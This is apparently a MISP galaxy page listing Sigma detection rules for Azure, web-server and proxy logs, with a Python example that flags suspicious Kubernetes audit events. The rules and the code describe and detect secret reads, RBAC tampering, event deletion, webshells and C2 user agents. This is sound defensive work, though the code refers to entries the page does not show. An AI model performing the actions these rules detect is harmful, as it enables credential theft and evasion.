UUID af6925b0-8826-47f1-9324-337507a0babd which can be used as unique global reference for Azure DNS Zone Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_dns_zone_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.t1565.001']
Related clusters

To see the related clusters, click here.

Azure Virtual Network Modified or Deleted

Identifies when a Virtual Network is modified or deleted in Azure.

Internal MISP references

UUID bcfcc962-0e4a-4fd9-84bb-a833e672df3f which can be used as unique global reference for Azure Virtual Network Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_virtual_network_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Device No Longer Managed or Compliant

Identifies when a device in Azure is no longer managed or compliant.

Internal MISP references

UUID 542b9912-c01f-4e3f-89a8-014c48cdca7d which can be used as unique global reference for Azure Device No Longer Managed or Compliant in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Administrator may have forgotten to review the device.']
filename azure_device_no_longer_managed_or_compliant.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Disabled MFA to Bypass Authentication Mechanisms

Detects when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms.

Internal MISP references

UUID 7ea78478-a4f9-42a6-9dcd-f861816122bf which can be used as unique global reference for Disabled MFA to Bypass Authentication Mechanisms in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ionsor
creation_date 2022/02/08
falsepositive ['Authorized modification by administrators']
filename azure_mfa_disabled.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Azure Point-to-site VPN Modified or Deleted

Identifies when a Point-to-site VPN is modified or deleted.

Internal MISP references

UUID d9557b75-267b-4b43-922f-a775e2d1f792 which can be used as unique global reference for Azure Point-to-site VPN Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_p2s_vpn_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Keyvault Secrets Modified or Deleted

Identifies when secrets are modified or deleted in Azure.

Internal MISP references

UUID b831353c-1971-477b-abb6-2828edc3bca1 which can be used as unique global reference for Azure Keyvault Secrets Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['Secrets being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_keyvault_secrets_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access', 'attack.t1552', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Azure Kubernetes Network Policy Change

Identifies when an Azure Kubernetes network policy is modified or deleted.

Internal MISP references

UUID 08d6ac24-c927-4469-b3b7-2e422d6e3c43 which can be used as unique global reference for Azure Kubernetes Network Policy Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_network_policy_change.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access']

Azure Kubernetes Service Account Modified or Deleted

Identifies when a service account is modified or deleted.

Internal MISP references

UUID 12d027c3-b48c-4d9d-8bb6-a732200034b2 which can be used as unique global reference for Azure Kubernetes Service Account Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_service_account_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.
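The Azure Kubernetes entries above (Secret or Config Object Access, Sensitive Role Access, RoleBinding/ClusterRoleBinding, CronJob, Events Deleted, Network Policy Change and Service Account) all key on the same signal: a verb applied to a sensitive resource in the Kubernetes audit log. The following Python is an added example, not the Sigma project's rule code. It runs over Kubernetes audit `Event` objects (`audit.k8s.io/v1`) constructed inline; in AKS these arrive through the kube-audit diagnostic setting inside an Azure log envelope, which is not modelled here. The (resource, verb) to entry-name mapping and the exemption prefixes are this example's own choices, written from the entry descriptions rather than from the rules' exact selections.

```python
"""Kubernetes audit-event triage for the AKS entries above.

Added illustrative example, not the Sigma project's own rule code. The
resource/verb mapping and the exemption list below are assumptions.
"""
from typing import Any, Dict, List, Optional, Set, Tuple

Event = Dict[str, Any]

READ = {"get", "list", "watch"}
MODIFY = {"update", "patch", "delete", "deletecollection"}

# (entry name, resources, verbs), evaluated in order; first match wins.
RULES: List[Tuple[str, Set[str], Set[str]]] = [
    ("Azure Kubernetes Secret or Config Object Access", {"secrets", "configmaps"}, READ),
    ("Azure Kubernetes Sensitive Role Access", {"roles", "clusterroles"}, MODIFY),
    ("Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted",
     {"rolebindings", "clusterrolebindings"}, {"create", "patch", "update", "delete"}),
    ("Azure Kubernetes Service Account Modified or Deleted", {"serviceaccounts"}, MODIFY),
    ("Azure Kubernetes Network Policy Change", {"networkpolicies"}, MODIFY),
    ("Azure Kubernetes CronJob", {"cronjobs", "jobs"}, {"create"}),
    ("Azure Kubernetes Events Deleted", {"events"}, {"delete", "deletecollection"}),
]

# Example tuning for the "known behaviour" false positives the entries mention:
# kubelets and kube-system controllers read Secrets and ConfigMaps constantly.
# Applied to read verbs only; a system identity mutating RBAC still surfaces.
EXEMPT_READERS = ("system:node:", "system:kube-controller-manager",
                  "system:serviceaccount:kube-system:")


def match(event: Event) -> Optional[str]:
    """Entry name for one audit event, or None."""
    # The API server logs a request at RequestReceived and again at
    # ResponseComplete; use only the latter so each request counts once
    # and the HTTP status is available.
    if event.get("stage") != "ResponseComplete":
        return None
    ref = event.get("objectRef") or {}
    resource = ref.get("resource")
    verb = event.get("verb")
    user = (event.get("user") or {}).get("username", "")
    for name, resources, verbs in RULES:
        if resource in resources and verb in verbs:
            if verb in READ and user.startswith(EXEMPT_READERS):
                return None
            return name
    return None


def triage(events: List[Event]) -> List[Tuple[str, str, int, str]]:
    """(username, resource/namespace/name, HTTP status, entry) per matching event.

    Denied requests (403) are kept on purpose: an unknown principal probing
    Secrets is worth seeing even when RBAC stopped it.
    """
    hits = []
    for event in events:
        name = match(event)
        if not name:
            continue
        ref = event.get("objectRef") or {}
        target = f"{ref.get('resource')}/{ref.get('namespace', '-')}/{ref.get('name') or '-'}"
        status = int((event.get("responseStatus") or {}).get("code", 0))
        hits.append(((event.get("user") or {}).get("username", "?"), target, status, name))
    return hits


def _event(user: str, verb: str, resource: str, name: str, namespace: Optional[str] = None,
           code: int = 200, stage: str = "ResponseComplete") -> Event:
    """Build a minimal audit.k8s.io/v1 Event (constructed sample data)."""
    ref: Dict[str, str] = {"resource": resource, "name": name}
    if namespace:
        ref["namespace"] = namespace
    return {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "stage": stage,
            "verb": verb, "user": {"username": user}, "objectRef": ref,
            "responseStatus": {"code": code}}


# Constructed sample events; not from a real cluster.
SAMPLE_EVENTS: List[Event] = [
    _event("system:node:aks-nodepool1-0", "get", "secrets", "app-tls", "prod"),      # kubelet: exempt
    _event("dev-ci@contoso.example", "list", "secrets", "", "prod"),                 # bulk read of Secrets
    _event("dev-ci@contoso.example", "create", "clusterrolebindings", "ci-admin"),   # cluster-scope binding
    _event("dev-ci@contoso.example", "create", "cronjobs", "cache-warm", "prod"),    # scheduled execution
    _event("dev-ci@contoso.example", "deletecollection", "events", "", "prod"),      # clearing the trail
    _event("dev-ci@contoso.example", "list", "secrets", "", "prod", stage="RequestReceived"),  # counted once
    _event("ops@contoso.example", "get", "pods", "web-0", "prod"),                   # not a covered resource
]

if __name__ == "__main__":
    for user, target, status, name in triage(SAMPLE_EVENTS):
        print(f"{name}: {user} {target} ({status})")
```

The exemption list is where tuning happens: extend it with the service accounts of operators that legitimately read Secrets (cert-manager, external-secrets and the like), but keep mutations of Roles, bindings and ServiceAccounts unexempted so that a compromised operator token still shows up.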

Nginx Core Dump

Detects a core dump of a crashing Nginx worker process, which can signal a serious problem or an exploitation attempt.

Internal MISP references

UUID 59ec40bb-322e-40ab-808d-84fa690d7e56 which can be used as unique global reference for Nginx Core Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/05/31
falsepositive ['Serious issues with a configuration or plugin']
filename web_nginx_core_dump.yml
level high
logsource.category No established category
logsource.product No established product
tags ['attack.impact', 'attack.t1499.004']
Related clusters

To see the related clusters, click here.

Apache Threading Error

Detects threading-related error messages reported in Apache logs.

Internal MISP references

UUID e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c which can be used as unique global reference for Apache Threading Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/22
falsepositive ['3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185']
filename web_apache_threading_error.yml
level medium
logsource.category No established category
logsource.product No established product
tags ['attack.initial_access', 'attack.lateral_movement', 'attack.t1190', 'attack.t1210']
Related clusters

To see the related clusters, click here.

Apache Segmentation Fault

Detects a segmentation fault error message caused by a crashing apache worker process

Internal MISP references

UUID 1da8ce0b-855d-4004-8860-7d64d42063b1 which can be used as unique global reference for Apache Segmentation Fault in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/28
falsepositive ['Unknown']
filename web_apache_segfault.yml
level high
logsource.category No established category
logsource.product No established product
tags ['attack.impact', 'attack.t1499.004']
Related clusters

To see the related clusters, click here.

Windows Webshell Strings

Detects common commands used in Windows webshells

Internal MISP references

UUID 7ff9db12-1b94-4a79-ba68-a2402c5d6729 which can be used as unique global reference for Windows Webshell Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2017/02/19
falsepositive ['Web sites like wikis with articles on os commands and pages that include the os commands in the URLs', 'User searches in search boxes of the respective website']
filename web_win_webshells_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

JNDIExploit Pattern

Detects exploitation attempts using the JNDI-Exploit-Kit.

Internal MISP references

UUID 412d55bc-7737-4d25-9542-5b396867ce55 which can be used as unique global reference for JNDIExploit Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/12
falsepositive ['Legitimate apps that use these paths']
filename web_jndi_exploit.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

SQL Injection Strings In URI

Detects potential SQL injection attempts via GET requests in access logs.

Internal MISP references

UUID 5513deaf-f49a-46c2-a6c8-3f111b5cb453 which can be used as unique global reference for SQL Injection Strings In URI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)
creation_date 2020/02/22
falsepositive ['JavaScript and CSS files', 'User searches in search boxes of the respective website', 'Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes']
filename web_sql_injection_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

F5 BIG-IP iControl Rest API Command Execution - Webserver

Detects POST requests to the F5 BIG-IP iControl REST API "bash" endpoint, which allows command execution on the BIG-IP.

Internal MISP references

UUID 85254a62-22be-4239-b79c-2ec17e566c37 which can be used as unique global reference for F5 BIG-IP iControl Rest API Command Execution - Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023/11/08
falsepositive ['Legitimate usage of the BIG IP REST API to execute command for administration purposes']
filename web_f5_tm_utility_bash_api_request.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.execution', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Source Code Enumeration Detection by Keyword

Detects source code enumeration via GET requests by searching for keywords in URL strings.

Internal MISP references

UUID 953d460b-f810-420a-97a2-cfca4c98e602 which can be used as unique global reference for Source Code Enumeration Detection by Keyword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author James Ahearn
creation_date 2019/06/08
falsepositive ['Unknown']
filename web_source_code_enumeration.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Java Payload Strings

Detects possible Java payloads in web access logs

Internal MISP references

UUID 583aa0a2-30b1-4d62-8bf3-ab73689efe6c which can be used as unique global reference for Java Payload Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Harjot Singh, "@cyb3rjy0t" (update)
creation_date 2022/06/04
falsepositive ['Legitimate apps']
filename web_java_payload_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['cve.2022.26134', 'cve.2021.26084', 'attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Cross Site Scripting Strings

Detects XSS attempts injected via GET requests in access logs

Internal MISP references

UUID 65354b83-a2ea-4ea6-8414-3ab38be0d409 which can be used as unique global reference for Cross Site Scripting Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Saw Win Naung, Nasreddine Bencherchali
creation_date 2021/08/15
falsepositive ['JavaScript, CSS and PNG files', 'User searches in search boxes of the respective website', 'Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes']
filename web_xss_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1189']
Related clusters

To see the related clusters, click here.

Path Traversal Exploitation Attempts

Detects path traversal exploitation attempts

Internal MISP references

UUID 7745c2ea-24a5-4290-b680-04359cb84b35 which can be used as unique global reference for Path Traversal Exploitation Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/09/25
falsepositive ['Expected to be continuously seen on systems exposed to the Internet', 'Internal vulnerability scanners']
filename web_path_traversal_exploitation_attempt.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Suspicious User-Agents Related To Recon Tools

Detects known suspicious (default) user-agents related to scanning/recon tools

Internal MISP references

UUID 19aa4f58-94ca-45ff-bc34-92e533c0994a which can be used as unique global reference for Suspicious User-Agents Related To Recon Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Tim Shelton
creation_date 2022/07/19
falsepositive ['Unknown']
filename web_susp_useragents.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Webshell ReGeorg Detection Via Web Logs

Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.

Internal MISP references

UUID 2ea44a60-cfda-11ea-87d0-0242ac130003 which can be used as unique global reference for Webshell ReGeorg Detection Via Web Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/08/04
falsepositive ['Web applications that use the same URL parameters as ReGeorg']
filename web_webshell_regeorg.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Successful IIS Shortname Fuzzing Scan

When IIS runs on an old .NET Framework, it is possible to enumerate folders using the "~" symbol (8.3 short names)

Internal MISP references

UUID 7cb02516-6d95-4ffc-8eee-162075e111ac which can be used as unique global reference for Successful IIS Shortname Fuzzing Scan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/10/06
falsepositive ['Unknown']
filename web_iis_tilt_shortname_scan.yml
level medium
logsource.category webserver
logsource.product No established product
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Suspicious Windows Strings In URI

Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication

Internal MISP references

UUID 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e which can be used as unique global reference for Suspicious Windows Strings In URI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/06
falsepositive ['Legitimate application and websites that use windows paths in their URL']
filename web_susp_windows_path_uri.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.persistence', 'attack.exfiltration', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Server Side Template Injection Strings

Detects SSTI attempts sent via GET requests in access logs

Internal MISP references

UUID ada3bc4f-f0fd-42b9-ba91-e105e8af7342 which can be used as unique global reference for Server Side Template Injection Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/14
falsepositive ['User searches in search boxes of the respective website', 'Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes']
filename web_ssti_in_access_logs.yml
level high
logsource.category webserver
logsource.product No established product
tags ['attack.defense_evasion', 'attack.t1221']
Related clusters

To see the related clusters, click here.

PUA - Advanced IP/Port Scanner Update Check

Detect the update check performed by Advanced IP/Port Scanner utilities.

Internal MISP references

UUID 1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d which can be used as unique global reference for PUA - Advanced IP/Port Scanner Update Check in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Axel Olsson
creation_date 2022/08/14
falsepositive ['Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environment.']
filename proxy_pua_advanced_ip_scanner_update_check.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.discovery', 'attack.t1590']
Related clusters

To see the related clusters, click here.

HackTool - Empire UserAgent URI Combo

Detects user agent and URI path combinations used by Empire agents

Internal MISP references

UUID b923f7d6-ac89-4a50-a71a-89fb846b4aa8 which can be used as unique global reference for HackTool - Empire UserAgent URI Combo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/13
falsepositive ['Valid requests with this exact user agent to server scripts of the defined names']
filename proxy_hktl_empire_ua_uri_patterns.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

APT User Agent

Detects suspicious user agent strings used in APT malware in proxy logs

Internal MISP references

UUID 6ec820f2-e963-4801-9127-d8b2dce4d31b which can be used as unique global reference for APT User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis
creation_date 2019/11/12
falsepositive ['Old browsers']
filename proxy_ua_apt.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Potential Base64 Encoded User-Agent

Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.

Internal MISP references

UUID 894a8613-cf12-48b3-8e57-9085f54aa0c3 which can be used as unique global reference for Potential Base64 Encoded User-Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Brian Ingram (update)
creation_date 2022/07/08
falsepositive ['Unknown']
filename proxy_ua_susp_base64.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Bitsadmin to Uncommon TLD

Detects Bitsadmin connections to domains with uncommon TLDs

Internal MISP references

UUID 9eb68894-7476-4cd6-8752-23b51f5883a7 which can be used as unique global reference for Bitsadmin to Uncommon TLD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2019/03/07
falsepositive ['Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca']
filename proxy_ua_bitsadmin_susp_tld.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190']
Related clusters

To see the related clusters, click here.

HackTool - BabyShark Agent Default URL Pattern

Detects Baby Shark C2 Framework default communication patterns

Internal MISP references

UUID 304810ed-8853-437f-9e36-c4975c3dfd7e which can be used as unique global reference for HackTool - BabyShark Agent Default URL Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/09
falsepositive ['Unlikely']
filename proxy_hktl_baby_shark_default_agent_url.yml
level critical
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Exploit Framework User Agent

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

Internal MISP references

UUID fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f which can be used as unique global reference for Exploit Framework User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_frameworks.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Windows WebDAV User Agent

Detects WebDav DownloadCradle

Internal MISP references

UUID e09aed7a-09e0-4c9a-90dd-f0d52507347e which can be used as unique global reference for Windows WebDAV User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/04/06
falsepositive ['Administrative scripts that download files from the Internet', 'Administrative scripts that retrieve certain website contents', 'Legitimate WebDAV administration']
filename proxy_downloadcradle_webdav.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Download from Suspicious Dyndns Hosts

Detects download of certain file types from hosts with dynamic DNS names (selected list)

Internal MISP references

UUID 195c1119-ef07-4909-bb12-e66f5e07bf3c which can be used as unique global reference for Download from Suspicious Dyndns Hosts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/11/08
falsepositive ['Software downloads']
filename proxy_download_susp_dyndns.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1105', 'attack.t1568']
Related clusters

To see the related clusters, click here.

Suspicious User Agent

Detects suspicious malformed user agent strings in proxy logs

Internal MISP references

UUID 7195a772-4b3f-43a4-a210-6a003d65caa1 which can be used as unique global reference for Suspicious User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_susp.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Telegram API Access

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

Internal MISP references

UUID b494b165-6634-483d-8c47-2026a6c52372 which can be used as unique global reference for Telegram API Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/05
falsepositive ['Legitimate use of Telegram bots in the company']
filename proxy_telegram_api.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001', 'attack.t1102.002']
Related clusters

To see the related clusters, click here.

Download From Suspicious TLD - Whitelist

Detects executable downloads from suspicious remote systems

Internal MISP references

UUID b5de2919-b74a-4805-91a7-5049accbaefe which can be used as unique global reference for Download From Suspicious TLD - Whitelist in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/13
falsepositive ['All kind of software downloads']
filename proxy_download_susp_tlds_whitelist.yml
level low
logsource.category proxy
logsource.product No established product
tags ['attack.initial_access', 'attack.t1566', 'attack.execution', 'attack.t1203', 'attack.t1204.002']
Related clusters

To see the related clusters, click here.

Malware User Agent

Detects suspicious user agent strings used by malware in proxy logs

Internal MISP references

UUID 5c84856b-55a5-45f1-826f-13f37250cf4e which can be used as unique global reference for Malware User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_malware.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

HTTP Request With Empty User Agent

Detects potentially suspicious empty user agent strings in proxy logs. Could indicate an uncommon request method.

Internal MISP references

UUID 21e44d78-95e7-421b-a464-ffd8395659c4 which can be used as unique global reference for HTTP Request With Empty User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/07/08
falsepositive ['Unknown']
filename proxy_ua_empty.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Windows PowerShell User Agent

Detects Windows PowerShell Web Access

Internal MISP references

UUID c8557060-9221-4448-8794-96320e6f3e74 which can be used as unique global reference for Windows PowerShell User Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/13
falsepositive ['Administrative scripts that download files from the Internet', 'Administrative scripts that retrieve certain website contents']
filename proxy_ua_powershell.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Suspicious Network Communication With IPFS

Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.

Internal MISP references

UUID eb6c2004-1cef-427f-8885-9042974e5eb6 which can be used as unique global reference for Suspicious Network Communication With IPFS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Gavin Knapp
creation_date 2023/03/16
falsepositive ['Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this.']
filename proxy_susp_ipfs_cred_harvest.yml
level low
logsource.category proxy
logsource.product No established product
tags ['attack.credential_access', 'attack.t1056']
Related clusters

To see the related clusters, click here.

Bitsadmin to Uncommon IP Server Address

Detects Bitsadmin connections to IP addresses instead of FQDN names

Internal MISP references

UUID 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3 which can be used as unique global reference for Bitsadmin to Uncommon IP Server Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/10
falsepositive ['Unknown']
filename proxy_ua_bitsadmin_susp_ip.yml
level high
logsource.category proxy
logsource.product No established product
tags ['attack.command_and_control', 'attack.t1071.001', 'attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190']
Related clusters

To see the related clusters, click here.

Rclone Activity via Proxy

Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string

Internal MISP references

UUID 2c03648b-e081-41a5-b9fb-7d854a915091 which can be used as unique global reference for Rclone Activity via Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/10/18
falsepositive ['Valid requests with this exact user agent that are generated by legitimate scripts or sysadmin operations']
filename proxy_ua_rclone.yml
level medium
logsource.category proxy
logsource.product No established product
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Crypto Miner User Agent

